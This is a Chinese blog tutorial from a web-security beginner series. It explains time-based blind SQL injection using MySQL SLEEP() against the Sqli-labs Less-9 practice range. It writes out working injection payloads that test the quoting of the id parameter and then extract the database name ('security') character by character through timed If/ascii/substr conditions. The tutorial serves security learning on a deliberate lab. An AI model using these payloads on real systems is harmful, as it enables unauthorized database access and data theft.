sql timestep 秒数后6位_SQL注入之时间型盲注

最新推荐文章于 2023-08-11 16:58:19 发布
最新推荐文章于 2023-08-11 16:58:19 发布
阅读量158 收藏
点赞数
文章标签: sql timestep 秒数后6位
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39964819/article/details/111388878
版权
本文介绍了如何通过时间型盲注技术在Sqli-labs靶场的Less-9关卡中判断注入点及执行结果。通过利用MySQL的SLEEP函数,结合If条件判断,逐步推测数据库名称及其字符,展示了时间型盲注的基本思路和操作过程。
摘要由CSDN通过智能技术生成

本文是Web安全入门系列的第5篇文章

01

束手无策?

首先介绍一个新的靶场,名为Sqli-labs。Sqli-labs是一个印度小哥写的,比较全面的SQL注入练习靶场。一共有75个关卡,从易到难囊括了多种SQL注入场景,且网上有非常多的学习资料,推荐给想要深入学习SQL注入的小伙伴~

9b78925df210e4b00b49f617c2def989.png

部署好靶场后,首页会看到关卡导航,列出了每个关卡练习的注入类型,我们要用到的是Less-9:基于时间的盲注81974986cee105c9cae817238447fa96.png

Sqli-labs关卡都是以id为输入参数的,在定位注入点时,尝试输入id=1,id=1',id=1"......无论怎么输入,返回结果都是"You are in ......."。

e0ad03fb123d2c7fa773106f70d4861d.png

因此得出结论:

1. 无法确定参数的传入类型。整型,加单引号,加双引号返回结果都一样

2. 不会回显注入语句执行结果,故无法使用UNION注入

3. 不会显示报错信息,故无法使用报错注入

4. 符合上一篇介绍的盲注的特征,但不属于布尔型盲注

看上去路都堵死了,难道就束手无策了么?

 1473296138c56afec5453ebaf0a7b8d5.png   a8ef05d2450dc388024f1b17f8d2e2e1.png   318b663249ee00d17785575e756f08d5.png

02

SLEEP(N)

上面的这种情况,怎么判断是否存在注入?注入的语句到底执行了没有?执行成功了还是失败了呢?这个时候,我们需要用到时间型盲注。

首先介绍MySQL的SLEEP(N)函数,通常情况下,执行SQL语句时是立即执行的。

0a8b88c858b02f71e23c0a5247d8d6f9.png

c3b23a8cb3fd1a791919fe1cba6f25df.png

加入SLEEP函数后可以强制停留2秒,但是只有指定条件的记录存在时才会停止指定的秒数。

568df741c9042f989fcadfceb9a96b72.png

如果查询一条并不存在的记录时使用SLEEP函数,也会立即执行。

996e6f037614af5c6bbea9419f8925db.png

看到这里,聪明的你是不是已经猜到了我们要用可爱的SLEEP做什么了呢?没错,我们就是要用SLEEP的这一特性来判断注入点,和注入语句的执行结果。

 bcacb44302900965105cd80de85db9a5.png c11aaac374e2a71baceac0789b14d86c.png

03

时间型盲注

回到Sqli lab的Less 9,首先判断注入的参数类型。

输入:id=1 and sleep(5) --+

用时:9ms,SLEEP函数没有被执行

c15324c0bf1074811687d0fb0fe1742a.png

输入:id=1" and sleep(5) --+

用时:8ms,SLEEP函数没有被执行

37e7d1be92e6a9cacb0ec2f801d3c141.png

输入:id=1' and sleep(5) --+

用时:5s,SLEEP函数被执行,注入参数id是字符型,传入时带单引号

c6a4f8094dc24462f7c4f886c4e36a95.png

这就是时间型盲注的思路,时间型盲注就是利用时间函数的延迟特性来判断注入语句是否执行成功。简称:你猜我睡着没有~       

04

时间型盲注实战

还记得我们上篇文章讲的盲注的终极奥义么?接下来,我们用终极奥义来拿更多的数据。

2cfc7ecedb8448403bd609f944232214.png

猜测数据库名称长度

输入:id=1' and If(length(database()) > 1,1,sleep(5))--+

用时:<1s,数据库名称长度>1

01a985db8940f1afada3afaee7c3dfeb.png

输入:id=1' and If(length(database()) > 2,1,sleep(5))--+

用时:<1s,数据库名称长度>2

输入:id=1' and If(length(database()) > 3,1,sleep(5))--+

用时:<1s,数据库名称长度>3

......

输入:id=1' and If(length(database()) >8 ,1,sleep(5))--+

用时:5s,数据库名称长度=8

b5ef53f5ad7493c2414a19a3641f54a0.png

最终得出结论:数据库名称长度等于8个字符。

猜测数据库名称的一个字符

输入:id=1' and If(ascii(substr(database(),1,1))=97,sleep(5),1)--+

用时:<1s

输入:id=1' and If(ascii(substr(database(),1,1))=98,sleep(5),1)--+

用时:<1s

输入:id=1' and If(ascii(substr(database(),1,1))=99,sleep(5),1)--+

用时:<1s

......

输入:id=1' and If(ascii(substr(database(),1,1))=115,sleep(5),1)--+

用时:5s

得出结论:数据库名称的第一个字符是小写字母s。

不理解97,98,99含义的同学,请参考ASCII编码对照表:http://ascii.911cha.com/

猜测数据库名称的二个字符

输入:id=1' and If(ascii(substr(database(),2,1))=97,sleep(5),1)--+

用时:<1s

输入:id=1' and If(ascii(substr(database(),2,1))=98,sleep(5),1)--+

用时:<1s

输入:id=1' and If(ascii(substr(database(),2,1))=99,sleep(5),1)--+

用时:<1s

......

输入:id=1' and If(ascii(substr(database(),2,1))=101,sleep(5),1)--+

用时:5s

得出结论:数据库名称的第一个字符是小写字母e。

......

依此类推,最后猜出数据库名称为:security。

本期内容就到这里了,篇幅有限,不用猜到手抽筋的神器留着下期介绍,期待下期再见~

d975be3d390c7f70306669b70ea32215.png

(部分图片源自网络,侵删)

weixin_39964819
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql timestep 秒数后6_有趣的SQL(一)
weixin_39753260的博客
12-17 259
大家都想提高自己的SQL能力,但是SQL能力也是需要慢慢提高的,为了让大家的SQL有所提高,特整理了下面的SQL。需求:如下所示,有从1开始的2的幂的数组- - 1, 2, 4, 8, 16, 32, 64, 128想求出如下结果,如,输入17 在上面的数组中应得出例:输入值 17 : 1 + 16输入值 31 : 1 + 2 + 4 + 16输入值 32 : 32想实现如上功能,首先...
SQL注入之基于布尔的盲注详解
09-10
布尔SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
unix 下获取系统时间,精确至微秒(秒后6)
11-30
获取unix下当前系统时间精确至微秒 ++++++2012-11-30 16:11:46:285572
mysql timestamp 用法_mysqlTIMESTAMP(时间戳)用法详解
weixin_33355290的博客
02-07 534
timestamp数据类是一个比较特殊的数据类,他可以自动在你不使用程序更新情况下只要你更新了记录timestamp会自动更新时间.通常表中会有一个Create date 创建日期的字段,其它数据库均有默认值的选项。MySQL也有默认值timestamp,但在MySQL中,不仅是插入就算是修改也会更新timestamp的值!这样一来,就不是创建日期了,当作更新日期来使用比较好!一、TIMEST...
后面的单是什么_小学数学时、分、秒的重要知识点整理及练习,建议收藏...
weixin_39959126的博客
12-15 3955
关注成长教育 解决学习困惑点击蓝字关注,与全国家长比肩同行知识点1.1时=(60)分2.钟面上有(12)个数,这些数把钟面分成了(12)个相等的大格,每个大格又分成了(5)个相等的小格,钟面上一共有(60)个小格。3.钟面上有(2)根针,短粗一点的针叫(时)针,细长一点的针叫(分)针。分针走1小格是(1)分,走1大格是(5)分,时针走1大格是(1)时。分针从12走到6,走了(30)分;...
mysql timestamp 字段
SkyOfCloud的专栏
11-25 604
如果使用Navicat 创建mysql表(比如表名是user),其中的timestamp字段(比如字段名是update_time),默认是`update_time` timestamp NOT NULL ON UPDATE CURRENT_TIMESTAMP DEFAULT CURRENT_TIMESTAMP,即就是说,默认是在更新信息时,将此字段的时间也更新为系统当前时间了,为了删掉这个默认的设
sql.rar_SQL防注入_asp 防注入_sql注入_防破
09-22
SQL注入是一种常见的网络安全威胁,它允许攻击者通过输入恶意的SQL语句来操纵数据库系统,获取敏感信息,甚至破坏整个数据库。在这个“sql.rar”压缩包中,我们重点关注的是如何防止这种攻击,尤其是针对ASP(Active...
zhuru.rar_SQL inject_asp注入_sql 注入_sql注入_zhuru sql
09-14
SQL注入】是一种常见的网络安全漏洞,它发生在应用程序未能充分验证用户输入的数据,导致恶意SQL代码被拼接到数据库查询中执行。在"zhuru.rar"这个压缩包中,包含了一个用于SQL注入测试的ASP(Active Server Pages...
SQL_zhuru.rar_sql 注入_sql注入
09-24
在"SQL_zhuru.rar_sql注入_sql注入"这个压缩包中,可能包含了关于如何识别、预防和应对SQL注入攻击的相关资料。 在"www.pudn.com.txt"文件中,可能包含了从Pudn网站下载的关于SQL注入的技术文章、教程或案例分析。...
SQL.rar_sql injection_sql 注入_sql注入
09-14
- **时间盲注**:如果应用无法正确处理查询时间,攻击者可能通过延时注入探测数据库结构,而无需直接获取数据。 4. **SQL.cpp源代码分析**: 这个文件可能包含示例代码,演示如何创建易受SQL注入攻击的应用,以及...
LSTM中timesteps的理解
07-04
这个文档有一个比较直观的关于时间步的理解,对于初学RNN网络的人来说,其中有些概念比较难懂,希望这个能帮助大家。
sql每五秒插入一条数据 一次插入N条数据
weixin_30430169的博客
11-10 238
1建立数据表 create table projectManage ( ID int identity primary key not null, projectName nvarchar(20)not null, manager_1 nvarchar(10) not null, manager_2 nvarchar(10) not null, monitor nvar...
SQL实现数据
热门推荐
xiaodoudou的专栏
02-17 1万+
我们在对数据库字段进行处理时,经常会把整数强制转换为varchar类,数字本身可分大小,但转换为字符串之后,原来的大小概念就被颠覆了。 比如88和800两个整数,在作为数字类时,800大于88是毋庸置疑的,但转换为字符串后,'800'和'88'的大小就被颠覆了,我们就做一个小实验,权当做一个验证,脚本如下: declare@num1int=88; declare@num2int=800; ifcast(@num1asvarchar)>cast(@num2...
sql注入总结
最新发布
qq_52973916的博客
08-11 567
sql学习
SQLMAP攻击流量特征分析
asaotomo的博客
12-02 1万+
本文通过抓包分析sqlmap的攻击流量,对其攻击流程和特征进行提取和归纳总结。
mysqlTIMESTAMP(时间戳)用法详解
01-02 8228
一、TIMESTAMP的变体 TIMESTAMP时间戳在创建的时候可以有多重不同的特性,如: 1.在创建新记录和修改现有记录的时候都对这个数据列刷新: ? 1 TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP 2.在创建新记录
SQL中如何取得系统时间和日期(时间要求返回6,比如152910;日期要求返回8,比如20070517)
Phoxe_bai的专栏
12-20 2398
<br />SQL中如何取得系统时间和日期(时间要求返回6,比如152910;日期要求返回8,比如20070517) <br />是不是有什么特定的函数?如果有,那取得系统时间和日期的函数返回类是字符吗?(要求是) SQL中CONVERT转化函数的用法 <br /> <br />CONVERT的使用方法: <br />//////////////////////////////////////////////////////////////////////////////////////// <
时间格式转化为时间戳保留秒级小数(统一保留6
onlyforbest的博客
06-14 7033
import datetime dt = datetime.datetime.strptime(str("2020-06-14 23:03:15.163813"), '%Y-%m-%d %H:%M:%S.%f') date_stamp =int(time.mktime(dt.timetuple())) data_microsecond=dt.microsecond/1000000 date_stamp = date_stamp + data_microsecond print(str(date_stamp.
sql注入时间盲注sleep被过滤
07-27
对于防止SQL注入中的时间盲注攻击,你可以采取以下一些措施来增强安全性: 1. 使用参数化查询或预编译语句:这是最有效的防止SQL注入攻击的方法之一。通过使用参数化查询或预编译语句,数据库会将输入的值视为数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值